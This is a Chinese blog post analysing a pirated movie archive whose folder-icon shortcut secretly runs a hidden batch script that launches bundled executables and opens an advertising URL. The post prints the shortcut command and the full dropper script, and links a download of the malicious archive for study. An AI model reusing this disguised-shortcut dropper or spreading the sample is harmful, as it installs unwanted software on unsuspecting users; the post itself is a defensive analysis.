标签:com http class blog style div img code java javascript tar
想看一部电影,下载好后,点开然后发现系统被装了一堆流氓软件,于是分析了压缩包的内容,发现些有趣的东西。
首先解压压缩包,进入解压后文件夹,发现都是链接(当时看到文件夹图标就点开了)
看看那个带有文件夹图标的属性
首先这是个快捷方式,然后运行一个命令
%windir%\system32\cmd.exe /c start 20140210\10.bat
cmd运行一个脚本,那个脚本在哪里呢,开启显示隐藏文件的属性后,再看那个解压后的文件夹
多了一个隐藏文件夹,打开一看
10.bat 那个脚本文件找到了,记事本打开看看
@echo off for /f "delims=" %%a in (‘dir 20140210\ /s /b /a-d^|findstr /v /i "10.bat"‘) do (start "" "%%a") start http://t.hao168.pw/akdata/load.html?baidu-20140210-冰雪奇缘迅雷种子_高清完整BD版种子 exit
基本意思就是运行文件夹”冰雪奇缘迅雷种子_高清完整BD版种子”中exe文件
原理很简单,但是很容易中招,如果那个脚本运行的是一些危害计算机的代码,麻烦就大了。
有兴趣研究的可下载看看,不过要小心不要运行那个快捷方式
http://pan.baidu.com/s/1o60RYp8
标签:com http class blog style div img code java javascript tar
原文地址:http://www.cnblogs.com/cpointer/p/3698045.html